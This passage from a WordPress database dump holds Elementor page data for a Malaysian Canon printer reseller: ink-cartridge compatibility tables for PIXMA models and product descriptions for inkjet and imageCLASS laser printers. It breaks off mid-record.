width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6974,3309,'_elementor_version','2.5.14'),(6977,3310,'_wp_page_template','template-fullwidth.php'),(6978,3310,'_elementor_edit_mode','builder'),(6979,3310,'_elementor_template_type','post'),(6980,3310,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 